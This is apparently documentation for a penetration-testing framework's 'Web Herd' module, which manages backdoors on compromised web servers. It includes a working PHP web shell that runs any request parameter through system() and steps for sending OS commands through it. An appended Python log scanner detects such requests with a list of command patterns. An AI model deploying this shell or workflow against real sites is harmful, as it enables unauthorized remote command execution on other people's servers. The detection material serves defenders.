Web Herd Module (HTTP Bot)
# Web Herd (HTTP Bot) Module

This module is meant to make maintaining web backdoors over HTTP less painful. The backdoors do not necessarily have to come from the Mth3l3m3nt Shell Generator Module. All they have to do is conform to this format:
http://url-of-victim/path/to/backdoor.extension?commandParameter=Command
Using the example from the Shell Generator Module, it would be something like:
http://victim.site/webdav/shell.php?cmd=whoami
This helps consolidate all web backdoors in one location, prevents forgetting backdoors on target systems when done, and saves the hassle of remembering where they are. No more runaway web shells.
Each bot is configured with three inputs:
- Zombie Name - a nice descriptive name for your bot
- Zombie Location - the HTTP path to the backdoor script
- Zombie Parameter - the parameter in the URL that receives commands, e.g. cmd or someparameter
For purposes of this illustration we will set out our bot like this:
- Attack Domain - attacker.google.com
- Victim Domain - demo.owasp-mth3l3m3nt-framework.com
Our backdoor has been uploaded through a WebDAV exploit and the backdoor is as below:

```php
<?php
if (isset($_REQUEST['cmd'])){
    $cmd=($_REQUEST["cmd"]);
    echo system($cmd);
    die;
}
?>
```

The address of the backdoor is http://demo.owasp-mth3l3m3nt-framework.com/webdav/cmd.php
- Click on Web herd
- Click on New Zombie
- Fill in the details as shown below:
In this case:
- Zombie Name - Owned Framework
- Zombie Location - http://demo.owasp-mth3l3m3nt-framework.com/webdav/cmd.php
- Zombie Parameter - cmd (refer to backdoor code above to see this)
Once a bot is added it will appear in the list as below:
To use a bot, click on the Control button next to it; a new window will appear.
- Type your command in the text box
- Click on Command me
A result will appear; an example is shown below:
You can add as many bots as you please. Once all is done, you need to destroy your bot and then remove it from your inventory.
- In the bot list, click Control on the bot you want to delete
- In the dialog, type the delete command, e.g.
windows: del /q script_name
linux: rm -f script_name
Our current host is Windows, therefore deleting it will be as below:
- After doing this go back to the bot list by clicking List all
- Click on the Delete Button next to the bot.
You have now successfully removed your backdoor.
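
From the defender's side, the request format this module relies on (a server-side script receiving an OS command in one URL parameter) is visible in web server access logs. The following is an added example, not part of the Mth3l3m3nt project: it scans combined-format log lines for such requests. The sample log lines, the script-extension list and the command list are constructed assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /webdav/cmd.php?cmd=whoami HTTP/1.1" 200 23 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:05:40 +0000] "GET /webdav/cmd.php?cmd=del+%2Fq+cmd.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Mar/2024:10:06:11 +0000] "GET /search.php?q=how+to+use+whoami HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2024:10:07:30 +0000] "GET /index.php?page=2 HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Script extensions a server may execute; adjust to the stack being monitored.
SCRIPT = re.compile(r"\.(php\d?|phtml|aspx?|jsp|cgi)$", re.I)
# A parameter whose value *starts with* an OS command, as in the page's examples
# (whoami, del /q, rm -f). The list is a heuristic chosen for this example.
COMMAND = re.compile(r"^\s*(whoami|uname|ipconfig|ifconfig|net\s+user|del\s+/|rm\s+-"
                     r"|cmd(\.exe)?\s+/c|powershell)\b", re.I)

def find_command_requests(log_text):
    """Return (client, time, path, parameter, value) for suspicious requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a combined-format request line
        client, when, _method, target, _status = m.groups()
        url = urlsplit(target)
        if not SCRIPT.search(url.path):
            continue
        # parse_qsl URL-decodes values, so "del+%2Fq" becomes "del /q".
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if COMMAND.search(value):
                hits.append((client, when, url.path, name, value))
    return hits

if __name__ == "__main__":
    for hit in find_command_requests(SAMPLE_LOG):
        print(hit)
```

Query-string matching only covers commands sent in the URL, as in the page's examples; checking writable directories such as the WebDAV folder for unexpected script files covers the rest.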
Developed by Munir Njiru